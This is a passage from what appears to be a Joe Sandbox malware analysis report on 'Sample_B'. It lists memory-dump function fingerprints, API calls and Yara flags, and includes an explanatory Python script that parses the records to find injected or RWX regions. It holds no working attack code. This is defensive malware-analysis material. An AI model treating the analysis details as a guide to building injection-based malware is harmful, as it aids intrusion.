• UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A32C
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: FileUnmapView
• String ID:
• API String ID: 2564024751-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• setsockopt.WS2_32(?,?,?,?,?), ref: 0027B990
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: setsockopt
• String ID:
• API String ID: 3981526788-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: DestroyWindow
• String ID:
• API String ID: 3375834691-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowPlacement.USER32(?,?), ref: 005D271F
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: PlacementWindow
• String ID:
• API String ID: 2154376794-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A6CC
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 76d85940157b57394e0e43a786f99b83f3c2ef521ab9aa1c5422dbe800564919
                                                                                  • Instruction ID: 4c677f99874c7f3982a39fac3a4b8e9368096e3557d517c4e6868acd51c8b95b
                                                                                  • Opcode Fuzzy Hash: 76d85940157b57394e0e43a786f99b83f3c2ef521ab9aa1c5422dbe800564919
                                                                                  • Instruction Fuzzy Hash: 15310730E52208CFDB19EBB8C4919EEB772EF8A305F50996DE40137350DB36A849CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2107974e0018423311e61a6aa89a3b18e0b0c76f3eb303d670d520c72ce06ded
                                                                                  • Instruction ID: 2489c0325ce51a383414d092a8f0e01227a8aa42d52f81d153f923c49ac51658
                                                                                  • Opcode Fuzzy Hash: 2107974e0018423311e61a6aa89a3b18e0b0c76f3eb303d670d520c72ce06ded
                                                                                  • Instruction Fuzzy Hash: 992179355097C0CFD707CB20D890B51BFB1AF46318F1981EED8889B6A3C73A980ACB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea5f0276d7cbaa6d31052f4f7e8786e0735c73194a69e7976a43f6177a34b358
                                                                                  • Instruction ID: 4a44ab21ae35b87ecc5b1a7101dde547212ed75d8d9198e8490ac3640172224b
                                                                                  • Opcode Fuzzy Hash: ea5f0276d7cbaa6d31052f4f7e8786e0735c73194a69e7976a43f6177a34b358
                                                                                  • Instruction Fuzzy Hash: 4611E435204384DFE325EB10C880F15F7A1AB88708F24C5ADE8490B643C77BD807DB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dfeb13113e235171247c2af86959676c5f7059fd0f64c2abf1e6c856f913c760
                                                                                  • Instruction ID: 8001f7562d0b208ea7e7aa18ab872f9969d3dde657dcd2facc9cb93cca7abd27
                                                                                  • Opcode Fuzzy Hash: dfeb13113e235171247c2af86959676c5f7059fd0f64c2abf1e6c856f913c760
                                                                                  • Instruction Fuzzy Hash: 3B0186B6509780AFD711CF159C40863FFE8EF86660749C4AFEC498B612D225B905CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e90a8755c4761227b80e8b3ca0241defe4d0f7d58261ff0dff772c376618b73
                                                                                  • Instruction ID: 1af36575ffb78ef3d89380db24694473023d4e075d97c27fca9296910f9fb6a5
                                                                                  • Opcode Fuzzy Hash: 8e90a8755c4761227b80e8b3ca0241defe4d0f7d58261ff0dff772c376618b73
                                                                                  • Instruction Fuzzy Hash: DFF0FF30943208DFDB19DFB4D554BAE7376EF86309F205CA98405233548B7A9E41EB09
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afe52d2f00f9f90c0f5d33a41cc043c941651088b769e2630944069877be168f
                                                                                  • Instruction ID: 215f385608cff3c6ca338b600b2597b58635884f86be2f1a0da9dd1a14987fa8
                                                                                  • Opcode Fuzzy Hash: afe52d2f00f9f90c0f5d33a41cc043c941651088b769e2630944069877be168f
                                                                                  • Instruction Fuzzy Hash: 0601E438D09249EFCB05DBA8D9849ADBFF0BF49300F2585DAD848A7352D630AE15DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afe8d0ecdcaea39f8c30042fb237950ae7ae6b275f357d6908a5baf7e84f9437
                                                                                  • Instruction ID: d0902bff7530c04af7cc9bb3caca7381d941d037b267de9dacf870a755c8ef0d
                                                                                  • Opcode Fuzzy Hash: afe8d0ecdcaea39f8c30042fb237950ae7ae6b275f357d6908a5baf7e84f9437
                                                                                  • Instruction Fuzzy Hash: 7DF08270D412099BDB589FA9C86A7FFBEF4AB49300F10682AD400B3280DA745948CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d3dc012acac435e46bd521e49023c80bc9de08216fba279c650b4eefced05f5
                                                                                  • Instruction ID: 9489e0de08681e65cba628ac2781002ee3ca44a029c4ff36ac6e52be0d0e0f40
                                                                                  • Opcode Fuzzy Hash: 9d3dc012acac435e46bd521e49023c80bc9de08216fba279c650b4eefced05f5
                                                                                  • Instruction Fuzzy Hash: FDF0823480A398DFCB06DB7494555D87FB0AF46301F2090E7C844972A2E6311E4ADB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction ID: acb651935c8e83942a390d04cea1e56cb19635ca6cd53ece9adeac6fdfea4bda
                                                                                  • Opcode Fuzzy Hash: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction Fuzzy Hash: E7F0F635108644DFC316CB14D940F15FBA2EB89718F24C6ADE9891B662C737A813DB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34a1492a2718c499d77c2f2567af876d6d4315b865e127e2682eacd96a6630b9
                                                                                  • Instruction ID: ac97a68f76569f4d8d8bc06b0d770cae7bb1b6d1cb2ba558bbf953c7702e6ebd
                                                                                  • Opcode Fuzzy Hash: 34a1492a2718c499d77c2f2567af876d6d4315b865e127e2682eacd96a6630b9
                                                                                  • Instruction Fuzzy Hash: D4F03074901108DFC708EFB4D559A6DBBB1EF82202F2010A8D40533361DF706E48CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 81527ac938b866d001a8fdea7e4f70350590362e3109b6be105e069903bff4d1
                                                                                  • Instruction ID: fb823bd0d7aa4432b32bf71eca5c21ec6054410fe3be28a9e64dcb5e8b1e725a
                                                                                  • Opcode Fuzzy Hash: 81527ac938b866d001a8fdea7e4f70350590362e3109b6be105e069903bff4d1
                                                                                  • Instruction Fuzzy Hash: D9E09276A407008BEB50CF0AEC41452F7D4EB84A30B08C07FDC0D8B700D136B504CAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b891a5e1b3111f0c9262d602c9adab5fa8d505fc61222a77ca1bac6a33b8cebd
                                                                                  • Instruction ID: 1f4d4a96ec993ae64df20edd17bd8a136b5dd2e9bf65f70d24edcfd14f3c83be
                                                                                  • Opcode Fuzzy Hash: b891a5e1b3111f0c9262d602c9adab5fa8d505fc61222a77ca1bac6a33b8cebd
                                                                                  • Instruction Fuzzy Hash: D2F01574C02208DFCB04EFB4E5485AEBBB4FB0A306F5059A9C81063350D7359A40CF84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc9306ed6b75f13fd3b3c8eb9aa064ec0b4d2d47629975f5196d275397f3808f
                                                                                  • Instruction ID: 5252a17e0ed0d9e01aefa09176f933e0d5d13bcc47ca4640d9539b47e17f069d
                                                                                  • Opcode Fuzzy Hash: dc9306ed6b75f13fd3b3c8eb9aa064ec0b4d2d47629975f5196d275397f3808f
                                                                                  • Instruction Fuzzy Hash: 7AE04638952208DFCB04EFA4D6899ADBBB4BF46301F2011E9DC4463761DB30AE58CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c21b13f02cad51066166f2417e20c537a34197b0a17ecf3419c2930bf80a364
                                                                                  • Instruction ID: d9ed58aadef080c62e51099c37521759ea623a6cc44a6d200e0caeef4befea78
                                                                                  • Opcode Fuzzy Hash: 4c21b13f02cad51066166f2417e20c537a34197b0a17ecf3419c2930bf80a364
                                                                                  • Instruction Fuzzy Hash: 42E04F38906208DBCB18EFA4E54899CBBF5BB45302F1050AACC4553350D7315E48DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7404125742d4321a6697e90d518a2800e420c2bdbad6139f65f648e1b30babca
                                                                                  • Instruction ID: a1755f0b1a6e94ba3913b465c1764e920b3db76db74dda5111db9f9fcb5ffe81
                                                                                  • Opcode Fuzzy Hash: 7404125742d4321a6697e90d518a2800e420c2bdbad6139f65f648e1b30babca
                                                                                  • Instruction Fuzzy Hash: B5D01736D01208CBCB008FA8E4882EDFBB0FB8A329F209826C614B3250C3318445CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b2131c4f2219cfd728c7948963e9bae0fd257a63793e03e90ba8ff6d3cd3aff
                                                                                  • Instruction ID: 96cf7e0a08974883f649e13721855ea6d1e315ec2bdb8ae5a4948a4758309622
                                                                                  • Opcode Fuzzy Hash: 4b2131c4f2219cfd728c7948963e9bae0fd257a63793e03e90ba8ff6d3cd3aff
                                                                                  • Instruction Fuzzy Hash: ECD0A731843208DBC709EFA0D50562AB379A703201F5010A8C804236408775AE14C699
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f366807c561f1199c503da5f976c16f1dfdeb7020969111e661933a8910f428
                                                                                  • Instruction ID: c2f907b17b2e2939a38f8d8365debc05ab922426882bf15c21f14c7fe8617844
                                                                                  • Opcode Fuzzy Hash: 1f366807c561f1199c503da5f976c16f1dfdeb7020969111e661933a8910f428
                                                                                  • Instruction Fuzzy Hash: 41D0C93AE01208CFCB008FE8F4841DCF771EB8E229F209566C614B3250C7319855CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075644490.0000000000272000.00000040.00000001.sdmp, Offset: 00272000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_272000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
                                                                                  • Instruction ID: 804fc76ef16f416331efc28e9400a0f39df3c7009c176d1773cc601fdfdf41a7
                                                                                  • Opcode Fuzzy Hash: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
                                                                                  • Instruction Fuzzy Hash: C0D05E79214A92CFD7168E1CC1A4B9537D4AB51B04F4684F9E804CB6A3C778E995D200
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075644490.0000000000272000.00000040.00000001.sdmp, Offset: 00272000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_272000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
                                                                                  • Instruction ID: d4fdc04ea822915b5b6381e0a9102d83ce9e04ed710e03fbb65e24263130e06d
                                                                                  • Opcode Fuzzy Hash: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
                                                                                  • Instruction Fuzzy Hash: 4FD05E343106828BDB15CE0CC294F5973E4AB40700F0684ECFC048B266C3B8EC94C600
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

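The records above, and those that follow under "Non-executed Functions", are the Joe Sandbox function fingerprints for each memory dump: the source .sdmp file, whether the region parsed as a PE, Yara hits, and per-function Opcode and Instruction IDs. The Python script below is an added triage example and is not part of the Joe Sandbox report or its tooling. It parses records in this layout, groups them per dump, counts distinct Opcode IDs (so byte-identical functions that appear as separate records are counted once) and flags the regions an analyst would pull first. Two things in it are assumptions of the example rather than facts the report states: that the fifth dot-separated field of the .sdmp name is a Windows PAGE_* protection value (0x20 and 0x40 in the names above), and the three-record SAMPLE, which is constructed from the page's record layout. The helper names (parse_records, summarise, suspicious_dumps) are likewise the example's own.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and summarise them per dump."""
import re
from collections import OrderedDict

# Constructed sample in the layout used by the report: one non-PE region whose
# name carries 0x40, and two records from the same PE-based region (0x20) that
# share an Opcode ID, i.e. byte-identical function bodies.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
Similarity
• Opcode ID: 1f366807c561f1199c503da5f976c16f1dfdeb7020969111e661933a8910f428
• Instruction ID: c2f907b17b2e2939a38f8d8365debc05ab922426882bf15c21f14c7fe8617844
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
Joe Sandbox IDA Plugin
Yara matches
• String ID: UUUU
• Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
• Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
Yara matches
• Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
• Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
Uniqueness Score: -1.00%
"""

# Windows PAGE_* protection constants from winnt.h (low byte; modifier bits masked off).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
OPCODE_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")


def decode_protection(sdmp_name):
    """ASSUMPTION of this example: the fifth dot-separated field of the .sdmp
    name is the page protection in hex. Returns (name, executable, writable)."""
    fields = sdmp_name.split(".")
    if len(fields) < 5:
        return "UNKNOWN", False, False
    value = int(fields[4], 16) & 0xFF
    name = PAGE_PROTECTIONS.get(value, "UNKNOWN(0x%02x)" % value)
    executable = value >= 0x10
    writable = value in (0x04, 0x08, 0x40, 0x80)
    return name, executable, writable


def parse_records(text):
    """Split report text into one dict per 'Memory Dump Source' record.
    Leading indentation and bullets, as in the rendered report, are tolerated."""
    records = []
    for chunk in re.split(r"^\s*Memory Dump Source\s*$", text, flags=re.M)[1:]:
        m = SOURCE_RE.search(chunk)
        if not m:
            continue  # fragment without a source line (e.g. a cut-off record)
        op = OPCODE_RE.search(chunk)
        records.append({
            "file": m.group("file"),
            "offset": int(m.group("offset"), 16),
            "pe_based": m.group("pe") == "true",
            "yara": bool(re.search(r"^\s*Yara matches\s*$", chunk, flags=re.M)),
            "opcode_id": op.group("id") if op else None,
        })
    return records


def summarise(text):
    """Aggregate records per dump file: function count, distinct Opcode IDs,
    any Yara hit, and the decoded page protection of the region."""
    summary = OrderedDict()
    for r in parse_records(text):
        s = summary.get(r["file"])
        if s is None:
            name, executable, writable = decode_protection(r["file"])
            s = summary[r["file"]] = {
                "offset": r["offset"], "pe_based": r["pe_based"],
                "protection": name, "executable": executable,
                "rwx": executable and writable, "yara": False,
                "functions": 0, "opcode_ids": set(),
            }
        s["functions"] += 1
        s["yara"] = s["yara"] or r["yara"]
        if r["opcode_id"]:
            s["opcode_ids"].add(r["opcode_id"])
    for s in summary.values():
        s["distinct_opcode_ids"] = len(s["opcode_ids"])
    return summary


def suspicious_dumps(summary):
    """Regions to pull first: writable+executable memory, or a PE image in a
    dump that also carries Yara matches (unpacked or injected payload candidates)."""
    return sorted(f for f, s in summary.items()
                  if s["rwx"] or (s["pe_based"] and s["yara"]))


if __name__ == "__main__":
    for f, s in summarise(SAMPLE).items():
        print(f, s["protection"], "functions=%d distinct=%d yara=%s" %
              (s["functions"], s["distinct_opcode_ids"], s["yara"]))
```

Pointed at the report's own text, this reduces a few hundred fingerprint records to one line per dump. If the protection-field assumption holds, the 0xBC0000 dump is an executable PE-based region with Yara matches and the 0x550000 dump is a non-PE RWX region, which is the pair of artifacts one expects from the process hollowing and PE injection the Signatures section reports; the dumps themselves, not the filename, are the authoritative source for that.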
                                                                                  Non-executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |=D$|=D
                                                                                  • API String ID: 0-3402754993
                                                                                  • Opcode ID: ab2dc095ae55c859755239602a46c3e7fa7984128b366afd088b67f6203d8fcb
                                                                                  • Instruction ID: 925e45eca7199ac4bd29ac13c254666291b8fc39c6a198b7b3b5d41be48a9c5f
                                                                                  • Opcode Fuzzy Hash: ab2dc095ae55c859755239602a46c3e7fa7984128b366afd088b67f6203d8fcb
                                                                                  • Instruction Fuzzy Hash: C9D1FF7BE146518BD714CFAAFCC010A73A3ABAA310B5B8660CB1567361D374BA13CBC4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: UUUU
                                                                                  • API String ID: 0-1798160573
                                                                                  • Opcode ID: 2d5baa18514cc11666b5d58127a1aa11a746746b246e3db812331feeade6b9e9
                                                                                  • Instruction ID: b7bd9134e592bb5a5285b317cb19094bd2f515e9b91c3b01707a55bbf1581a97
                                                                                  • Opcode Fuzzy Hash: 2d5baa18514cc11666b5d58127a1aa11a746746b246e3db812331feeade6b9e9
                                                                                  • Instruction Fuzzy Hash: 4E51D133B208610BE74CCA6D8C653696A9387C9350B1E867DDA96D73C2DEB8D912C284
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
